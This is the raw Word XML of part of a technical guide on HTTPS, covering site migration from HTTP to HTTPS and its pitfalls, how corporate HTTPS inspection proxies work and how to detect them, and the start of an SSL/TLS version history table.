          <w:bCs/>
        </w:rPr>
        <w:t>17. Migration from HTTP to HTTPS — Practical Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD98C01" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 The Migration Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DCFD79" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obtain certificates:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> For all domains and subdomains. Use wildcard certs or individual certs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F4CF37" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configure HTTPS on servers:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Install certificates, configure cipher suites, enable TLS 1.2+.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE5D07" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fix mixed content:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Update all internal links, asset URLs, API endpoints from http:// to https:// (or use protocol-relative //).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A03AC8A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set up HTTP → HTTPS redirects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FED931" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DEE2F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>301 Redirect: http://example.com/* → https://example.com/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B650CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Update external references:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Sitemaps, canonical URLs, API documentation, webhook configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A46F3AF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enable HSTS:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> After confirming everything works over HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF5C48" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258442F3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Strict-Transport-Security: max-age=31536000; includeSubDomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E092371" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submit to HSTS Preload List</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> (after running HSTS for a while without issues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA1849D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitor:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Check for mixed content warnings, certificate expiry alerts, and any HTTP traffic that wasn't redirected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1269375B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 Common Migration Pitfalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D5A00" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="946"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hardcoded HTTP URLs in databases/content:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Blog posts with &lt;img src="http://..."&gt; stored in the CMS database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F297D5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="946"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Third-party resources that don't support HTTPS:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Old CDNs, analytics scripts, ad networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB77415" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="946"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API clients that don't follow redirects:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> A 301 from HTTP to HTTPS breaks API clients that don't handle redirects (many don't by default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ED4230" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="946"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEO impact if redirects are wrong:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> 301 (permanent) preserves SEO. 302 (temporary) does not. All internal links must point to canonical HTTPS URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66110F3D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="946"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate covering all subdomains:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Forgetting mail.example.com, cdn.example.com, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37829544" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="946"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancer health checks using HTTP:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Backend health checks must also work over HTTPS (or use a separate HTTP health check endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A52014" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="7772B395">
          <v:rect id="_x0000_i3991" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC78F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. HTTPS Inspection (Corporate MITM) — How and Why</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334912BD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>18.1 How Corporate HTTPS Inspection Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560BE4B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7110B9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Employee ←TLS (corp CA cert)→ [Corporate Proxy] ←TLS (real cert)→ Internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B5C00" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Company installs its own Root CA certificate on all employee devices (via MDM/Group Policy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12256131" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>All traffic goes through a corporate proxy (transparent or explicit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E4B93" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Employee connects to https://gmail.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227617C7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proxy intercepts the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277AEAD0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proxy generates a NEW certificate for gmail.com signed by the corporate CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318EE5E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Employee's browser accepts it (corporate CA is trusted — it was installed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5216E5E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proxy establishes its OWN TLS connection to the real gmail.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E829E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proxy decrypts traffic in both directions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765CDFA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proxy can: inspect for data loss prevention (DLP), scan for malware, log activity, enforce policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BBCD8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.2 Detection and Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8A02F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to detect you're being MITM'd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C15EC43" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Check the certificate issuer in your browser. If it says "CorpProxy CA" instead of "Let's Encrypt" or "DigiCert," you're being inspected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3015A13B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Certificate pinning (in apps) prevents this — the connection fails because the pin doesn't match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D71492" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D1175" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="949"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The proxy sees ALL traffic (passwords, personal data, medical information, banking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D3AF57" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="949"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The proxy's CA key is a high-value target — if compromised, attackers can MITM everyone in the organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA5D91" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="949"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Breaks advanced security features: HPKP (deprecated), certificate pinning in apps, CT verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E47006" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="0660471B">
          <v:rect id="_x0000_i3992" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AA62AE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>19. Protocol Version Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E989883" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.1 SSL vs. TLS History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12"/>
        <w:gridCol w:w="903"/>
        <w:gridCol w:w="2169"/>
        <w:gridCol w:w="3730"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="60A76D3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1F9144" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Version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148F9B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Year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D6061A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>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B4D04A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="49D8089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16AC82" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>SSL 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E4A78F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1994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FCD280" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Never released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2418CA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
